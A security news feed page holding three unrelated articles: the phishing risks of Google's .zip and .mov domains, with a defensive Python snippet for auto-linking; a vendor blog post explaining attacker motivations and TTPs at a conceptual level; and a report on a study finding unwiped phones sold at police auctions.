Social Engineering | Potential Risks Surrounding Google’s New Top-Level Domains

Two of Google’s newly released top-level domains (TLDs), .zip and .mov, have cybersecurity experts warning of potential phishing and malware attacks. Earlier this month, Google introduced eight new TLDs to the general public, available to anyone purchasing a domain. Since .zip and .mov are widely used file extensions, the release gives threat actors another way to trick unsuspecting users, who think they are accessing legitimate compressed files or videos, into clicking malicious URLs.

To further the cause for concern, some online messaging platforms and social media sites automatically convert any text ending in .zip into a clickable link, taking the user straight to a website of the same name. Since internet users regularly post instructions that reference zip files and videos by name, threat actors could register malicious sites named after commonly shared files to launch phishing schemes or deploy malware onto the victim’s device. This scenario is especially dangerous in corporate environments, where just one infected endpoint could infect an entire network.

Since the launch of these new TLDs, there have been debates in the IT community about the severity of the issue. Google has responded to the matter, citing that the risk of confusion between domain names and file names is an existing challenge and can be mitigated through browser security measures. Security practitioners fall back on the suggestion to check links before clicking, access links through trusted sites only, and to be wary of files from untrusted sources.
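The browser and platform side of the mitigation Google points to is a linkification policy: a bare token such as "setup.zip" is a syntactically valid hostname under the new TLD, but it should not be auto-linked the way "example.com" is. The code below is an added example, not Google's or any platform's implementation; the simplified RFC 1123 label grammar and the policy of linking only explicit URLs and non-file-extension TLDs are assumptions.

```python
"""Spot bare .zip/.mov tokens that an auto-linker would turn into links to a domain."""
import re

# The two Google TLDs discussed above that double as common file extensions.
FILE_EXTENSION_TLDS = ("zip", "mov")

# One DNS hostname label (RFC 1123, simplified): alphanumerics and hyphens,
# 1 to 63 characters, no leading or trailing hyphen.
LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"

# A bare host ending in .zip/.mov that is not preceded by a path separator, an '@'
# (so "me@x.zip" is an address, not a host) or another hostname character.
BARE_HOST_RE = re.compile(
    rf"(?<![\w./@-])((?:{LABEL}\.)+(?:{'|'.join(FILE_EXTENSION_TLDS)}))\b",
    re.IGNORECASE,
)
EXPLICIT_URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def ambiguous_file_tokens(text):
    """Return tokens such as 'setup.zip' that read as file names but are valid hostnames.

    Anything already inside an explicit http(s) URL is skipped: the author meant a link there.
    """
    without_urls = EXPLICIT_URL_RE.sub(" ", text)
    return [m.group(1) for m in BARE_HOST_RE.finditer(without_urls)]


def should_autolink(token):
    """Linkification policy: link explicit http(s) URLs; link a bare hostname only
    when its TLD is not also a file extension, so 'report.zip' stays plain text."""
    if token.lower().startswith(("http://", "https://")):
        return True
    host = token.split("/", 1)[0]
    if "." not in host:
        return False
    return host.rsplit(".", 1)[1].lower() not in FILE_EXTENSION_TLDS


if __name__ == "__main__":
    # Constructed message text, not a real post.
    message = "Run the installer from setup.zip, then watch demo.mov or see https://docs.example.com"
    for token in ambiguous_file_tokens(message):
        print(f"would be linkified as a domain: {token} -> autolink={should_autolink(token)}")
```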

Inside the Mind of a Cyber Attacker | Tactics, Techniques, and Procedures (TTPs) Every Security Practitioner Should Know

Tactics, techniques, and procedures (TTPs) are the blueprint of threat actors’ attacks; understanding them allows cyber defenders to respond better to sophisticated attacks. As the threat landscape grows more complex with advances in malware, nation-state APT campaigns, and cybercrime-as-a-service offerings, TTPs remain a critical source of the knowledge enterprises need to stay ahead of attacks.

TTPs allow security professionals to look inside the minds of threat actors and understand their motivations and malicious goals. This is the first step in crafting effective countermeasures and a long lasting cyber defense posture. This post dives into the evolving TTPs used by modern cyber attackers and draws on recent campaigns and examples to underscore the challenges security practitioners face today.

Starting With Why | Peering Into the Motivations & Goals of Cyber Attackers

Understanding the motivations behind a cyberattack can greatly enhance the ability to effectively protect the organization. Breaking down the ‘who’, ‘why’ and ‘what’ of the attack can help defenders build a profile of the attackers including what they stand to gain in the event of a successful attack, how they are monetizing these gains, and how they are likely to strike again.

Based on their motivations and capabilities, there are six main reasons behind cyberattacks:

  1. Financial Gain – Cybercriminals often seek to steal sensitive data, such as credit card information or intellectual property (IP), to sell on the dark web or to use in other criminal activities. Cybercriminals motivated by profit are typically indifferent to who their targets are and what they stand for. Examples of financially motivated attacks include banking trojans like Emotet and ransomware, such as the DarkSide attack on Colonial Pipeline and the rash of double-extortion attacks by Ransomware-as-a-Service gangs like LockBit.
  2. Espionage – Nation-state actors and other advanced persistent threat (APT) groups often conduct cyber espionage campaigns to gather intelligence or steal IP for strategic purposes. They are usually funded or sponsored directly by the nation and target government-run organizations, opposing political entities, and large businesses. A well-known example of a cyber espionage campaign is the Stuxnet worm, which targeted Iranian nuclear facilities and more recently Metador, an unattributed threat actor targeting telcos, ISPs and universities.
  3. Disruption – Some cyber attackers aim to cause disruption or destruction, either for ideological reasons or as a form of ‘hacktivism’. The primary goal of hacktivists is to bring awareness to their cause through the exposure of secrets and sensitive information, or by taking down services or organizations deemed to be part of the opposition. Examples include the DDoS attacks carried out by Anonymous or the NotPetya ransomware attack, which caused significant damage to businesses worldwide. A more recent example of this at a mass scale is the AcidRain malware used to render Viasat KA-SAT modems inoperable in the first few months of the ongoing Russian-Ukrainian conflict.
  4. Cyber Terrorism – Cyber terrorism melds together two significant concerns: attacks using sophisticated technology, and traditional terrorism. Cyber terrorists are focused on attacking critical services to intentionally cause harm in furtherance of their political, economic, technical, or military agendas. They often target state services and essential industries to maximize destruction and disruption, such as the MeteorExpress attack on the Iranian train system. Cyber terrorism also seeks to intimidate, coerce, or influence vulnerable audiences to sow fear or force political change.
  5. Personal Causes – Unlike external threat actors that need to break into a targeted workspace, malicious insiders already have access rights into the environment and can work from within to get around the cybersecurity framework. Personal reasons such as revenge or retaliation are usually the motivation behind insider threats. Often in these cases, malicious insiders seek to steal and leak classified information or IP in the name of their personal cause.
  6. Attention & Notoriety – Script kiddies are low-level, unskilled attackers that leverage tools and available kits designed by others to penetrate a targeted system. Motivating factors for script kiddies are usually quite simple – they seek attention, excitement, and chaos. Also, cyberattackers motivated by reputation and attention are known to actively seek targets that are widely known and required to disclose the attack rather than smaller, unknown ones.

Reading the Blueprints | How Tactics, Techniques, and Procedures (TTPs) Help Cyber Defenders

TTPs play an essential role in empowering security defenders to combat cyber threats effectively. By analyzing and understanding TTPs, defenders gain valuable insights into the behaviors and methodologies employed by adversaries. This accelerates the process for identifying potential attacks, developing proactive defense strategies, and implementing security measures specific to business and industry risks.

Organizations like NIST and MITRE categorize and catalog the behaviors of threat actors into tactics, techniques, and procedures, collectively known as TTPs. Tactics are the highest-level description of the behavior, techniques describe how a tactic is carried out, and procedures describe the specific activities that make up a technique. To break this down further:

  • Tactics – These are the overarching strategies and goals behind an attack. They can be thought of as the ‘why’ behind the tactical objectives and explain the reasons fueling the cyberattacker. Tactics are important for cyber defenders as they can be used to build the threat profile of the actor being investigated. Many threat actors and groups are recognizable by their use of specific tactics.
  • Techniques – These are the methods that the threat actor uses to launch and engage in the attack to achieve their objective. Actors often use many techniques during their campaign to facilitate initial compromise, move laterally within the compromised environment, exfiltrate data, and more. Techniques can be analyzed at every stage of the cyberattack, leaving behind a distinguishable digital footprint of the threat actor.
  • Procedures – These are the step-by-step sequence of actions that make up the attack, including the tools and kits used by the threat actor. During forensic investigations for example, security analysts may perform file system analysis to reconstruct a procedure in order to build out a timeline of the attack. Analysts will also look for modifications to system files, find clues in event logs, and try to build a picture of what happened in each stage of the attack.

Being able to detect patterns and indicators of compromise through TTPs is instrumental in helping security professionals respond promptly to threats. It is also the trigger for critical improvements in policies and workflows that can stop similar threats in the future. TTPs serve as a foundation for threat intelligence, leading to better risk mitigation and a more collective approach to cybersecurity.

Understanding How TTPs Work in Real-World Attacks

Both the frequency of cybercrime and the pace at which it evolves continue to increase at staggering rates. Researchers estimate that the world will face 33 billion account breaches in 2023 alone and that attacks now occur once every 39 seconds. This section explores some of the most common TTPs used in modern threat campaigns and how they are leveraged in various types of real-world attacks.

Social Engineering

Social engineering is the psychological manipulation of individuals into divulging sensitive information or performing actions that compromise security. This tactic is often employed in phishing campaigns, such as the highly targeted spear-phishing attacks that have been linked to APT groups like APT29, also known as Cozy Bear, and APT28, also known as Sofacy or Fancy Bear. These campaigns often use highly convincing emails that appear to come from legitimate sources, luring victims into clicking malicious links or downloading malware-laden attachments.

Social engineering campaigns utilize various TTPs to manipulate human behavior and exploit vulnerabilities. Other than phishing, common TTPs associated with social engineering include:

  • Pretexting – The attacker creates a plausible scenario or false identity to deceive the target, gaining their trust, and extracting sensitive information.
  • Impersonation – Pretending to be someone else, such as a trusted colleague, authority figure, or service provider, to manipulate the target into providing sensitive data or performing certain actions.
  • Water-holing – Compromising legitimate websites frequently visited by the target audience and injecting malicious code or links to infect visitors’ devices.

Exploiting Vulnerabilities

Attackers often exploit known vulnerabilities in software and hardware to gain unauthorized access to systems or escalate privileges. One recent example is the exploitation of the Microsoft Exchange Server vulnerabilities, dubbed ProxyLogon and attributed to the HAFNIUM APT group. The group used these vulnerabilities to gain access to email accounts and deploy additional malware for further exploitation. Several TTPs are associated with vulnerability exploitation including:

  • Scanning – Conducting network or system scans to identify potential vulnerabilities, such as open ports, unpatched software, or misconfigurations.
  • Zero Day Exploits – Exploiting vulnerabilities that are unknown or have not yet been patched by the software vendor, giving attackers an advantage over defenders.
  • Privilege Escalation – Exploiting vulnerabilities or misconfigurations to elevate privileges and gain higher-level access within a system or network.
  • Remote Code Execution (RCE) – Exploiting vulnerabilities that allow an attacker to execute arbitrary code on a targeted system, providing full control over the compromised device.
  • Denial-of-Service (DoS) Attacks – Overloading a system or network with excessive requests or malicious traffic to disrupt its availability and potentially expose vulnerabilities.

Living Off the Land

“Living off the land” (LotL) is a tactic where attackers use legitimate tools and processes already present on a victim’s system to carry out their attacks, making it more difficult for security solutions to detect their activities. An example of this is the use of PowerShell, a powerful scripting language built into Windows, which has been used in various attacks, including the infamous Emotet banking trojan and the Ryuk ransomware. Threat actors are known to use these TTPs to achieve successful LotL:

  • Windows Management Instrumentation (WMI) Abuse – Leveraging the WMI infrastructure to execute commands, retrieve information, or interact with systems, bypassing security controls.
  • Scripting Language Abuse – Utilizing scripting languages like JavaScript, VBScript, AppleScript, or Python to execute malicious code or automate malicious activities.
  • Fileless Malware – Deploying malware that resides only in memory, leveraging legitimate system processes or functionalities to carry out malicious activities without leaving traditional file-based traces.
  • Masquerading – Disguising malicious files, processes, or commands with legitimate names, making them appear benign to evade detection.

Lateral Movement

Once attackers gain a foothold in a network, they often use lateral movement techniques to move between systems and escalate their privileges. In techniques like pass-the-hash or pass-the-ticket, an attacker uses stolen credentials or authentication tokens to move between systems.

One recent example is the SolarWinds supply chain attack, in which the threat actors used a combination of custom malware, stolen credentials, and legitimate tools to move laterally within the targeted networks, ultimately gaining access to sensitive data and systems. The following TTPs contribute to lateral movement:

  • Remote Desktop Protocol (RDP) Hijacking – Unauthorized control or manipulation of remote desktop sessions to move laterally between systems.
  • Credential Theft and Brute Force Attacks – Stealing or cracking credentials to impersonate legitimate users and move laterally within the network.
  • Man-in-the-Middle (MiTM) Attacks – Intercepting network traffic and tampering with communication to gain unauthorized access or escalate privileges.
  • Active Directory Exploitation – Exploiting weaknesses or misconfigurations within the Active Directory infrastructure to escalate privileges or gain unauthorized access to other systems or domains.

Data Exfiltration and Covering Tracks

After achieving their objectives, cyberattackers often exfiltrate the stolen data, using covert channels or encrypted communication to avoid detection. In some cases, attackers also take steps to cover their tracks and maintain persistence, such as deleting logs or using rootkits to hide their presence on compromised systems. A notable example of this is the DarkHotel APT group, known for its highly targeted attacks on luxury hotels, which utilized a combination of custom malware and sophisticated techniques to exfiltrate sensitive data and maintain a low profile within the compromised networks. To wipe away traces of their actions, attackers will often use a combination of these TTPs:

  • Compression and Encryption – Compressing or encrypting stolen data to obfuscate its content and make it more difficult to detect or analyze.
  • Protocol Tunneling – Encapsulating exfiltrated data within other network protocols, such as DNS or HTTP, to bypass security controls and avoid suspicion.
  • Data Obfuscation – Modifying or obfuscating data formats or file extensions to make exfiltrated information appear as benign or unrelated files.
  • Exfiltration Through Trusted Protocols – Utilizing commonly used protocols like FTP, SSH, or HTTP to transfer stolen data, blending it with legitimate network traffic to evade detection.
  • Data Destruction – Deleting or wiping data traces after exfiltration to eliminate evidence and hinder forensic investigations.

Proactive Measures for Security Practitioners

While understanding the TTPs is integral to the development of threat intelligence and defense mechanisms, this alone can only win half the battle. Enterprises must also enforce excellent cyber hygiene protocols and strengthen their security strategy holistically.

Implement a Strong Security Framework

Adopting a robust security framework, such as the NIST Cybersecurity Framework or the CIS Critical Security Controls, can help organizations systematically identify and address potential weaknesses in their security posture. Regularly reviewing and updating these frameworks is crucial to staying ahead of evolving threats.

Continuous Security Training and Awareness

Regular security training and awareness programs for employees can help reduce the risk of successful social engineering attacks. Training should cover topics like phishing, password security, and the importance of reporting suspicious activities.

Patch Management and Vulnerability Scanning

Implementing a robust patch management process and conducting regular vulnerability scans can help organizations identify and address known vulnerabilities in their systems, reducing the attack surface for cyber attackers.

Network Segmentation and Zero Trust

Network segmentation and the implementation of a zero trust security model can help limit lateral movement within a network, making it more difficult for attackers to escalate privileges and access sensitive data.

Monitoring and Incident Response

Establishing a well-defined incident response process and investing in monitoring tools, such as Security Information and Event Management (SIEM) systems or Extended Detection and Response (XDR) solutions like SentinelOne Singularity, can help organizations quickly detect, respond to, and contain cyber threats.

Conclusion

Identifying attack vectors and new methods is key to staying steps ahead of cyber attackers. Real-life examples and recent APT campaigns have shown how TTP analysis enriches security practitioners’ repertoire, allowing them to gain valuable insights into the tactics and techniques they are working against.

Though threat actors will continue to upgrade their methods and innovate their processes, there are many ways enterprises can mitigate risk and harden their defenses. Establishing an effective response strategy and deep, continuous monitoring can help augment a business’ in-house team’s defenses with robust detection and response capabilities.

Enterprises worldwide have turned to SentinelOne’s Singularity™ Platform to proactively resolve modern threats at machine speed. Learn how SentinelOne works to more effectively manage risk across user identities, endpoints, cloud workloads, IoT, and more. Contact us or book a demo today.

Re-Victimization from Police-Auctioned Cell Phones

Countless smartphones seized in arrests and searches by police forces across the United States are being auctioned online without first having the data on them erased, a practice that can lead to crime victims being re-victimized, a new study found. In response, the largest online marketplace for items seized in U.S. law enforcement investigations says it now ensures that all phones sold through its platform will be data-wiped prior to auction.

Researchers at the University of Maryland last year purchased 228 smartphones sold “as-is” from PropertyRoom.com, which bills itself as the largest auction house for police departments in the United States. Of phones they won at auction (at an average of $18 per phone), the researchers found 49 had no PIN or passcode; they were able to guess an additional 11 of the PINs by using the top-40 most popular PIN or swipe patterns.

Phones may end up in police custody for any number of reasons, such as their owner having been involved in identity theft, and in such cases the phone itself was used as a tool to commit the crime.

“We initially expected that police would never auction these phones, as they would enable the buyer to recommit the same crimes as the previous owner,” the researchers explained in a paper released this month. “Unfortunately, that expectation has proven false in practice.”

The researchers said while they could have employed more aggressive technological measures to work out more of the PINs for the remaining phones they bought, they concluded based on the sample that a great many of the devices they won at auction had probably not been data-wiped and were protected only by a PIN.

Beyond what you would expect from unwiped second hand phones — every text message, picture, email, browser history, location history, etc. — the 61 phones they were able to access also contained significant amounts of data pertaining to crime — including victims’ data — the researchers found.

Some readers may be wondering at this point, “Why should we care about what happens to a criminal’s phone?” First off, it’s not entirely clear how these phones ended up for sale on PropertyRoom.

“Some folks are like, ‘Yeah, whatever, these are criminal phones,’ but are they?” said Dave Levin, an assistant professor of computer science at University of Maryland.

“We started looking at state laws around what they’re supposed to do with lost or stolen property, and we found that most of it ends up going the same route as civil asset forfeiture,” Levin continued. “Meaning, if they can’t find out who owns something, it eventually becomes the property of the state and gets shipped out to these resellers.”

Also, the researchers found that many of the phones clearly had personal information on them regarding previous or intended targets of crime: A dozen of the phones had photographs of government-issued IDs. Three of those were on phones that apparently belonged to sex workers; their phones contained communications with clients.

An overview of the phone functionality and data accessibility for phones purchased by the researchers.

One phone had full credit files for eight different people on it. On another device they found a screenshot including 11 stolen credit cards that were apparently purchased from an online carding shop. On yet another, the former owner had apparently been active in a Telegram group chat that sold tutorials on how to run identity theft scams.

The most interesting phone from the batches they bought at auction was one with a sticky note attached that included the device’s PIN and the notation “Gry Keyed,” no doubt a reference to the Graykey software that is often used by law enforcement agencies to brute-force a mobile device PIN.

“That one had the PIN on the back,” Levin said. “The message chain on that phone had 24 Experian and TransUnion credit histories.”

The University of Maryland team said they took care in their research not to further the victimization of people whose information was on the devices they purchased from PropertyRoom.com. That involved ensuring that none of the devices could connect to the Internet when powered on, and scanning all images on the devices against known hashes for child sexual abuse material.

It is common to find phones and other electronics for sale on auction platforms like eBay that have not been wiped of sensitive data, but in those cases eBay doesn’t possess the items being sold. In contrast, platforms like PropertyRoom obtain devices and resell them at auction directly.

PropertyRoom did not respond to multiple requests for comment. But the researchers said sometime in the past few months PropertyRoom began posting a notice stating that all mobile devices would be wiped of their data before being sold at auction.

“We informed them of our research in October 2022, and they responded that they would review our findings internally,” Levin said. “They stopped selling them for a while, but then it slowly came back, and then we made sure we won every auction. And all of the ones we got from that were indeed wiped, except there were four devices that had external SD [storage] cards in them that weren’t wiped.”

A copy of the University of Maryland study is here (PDF).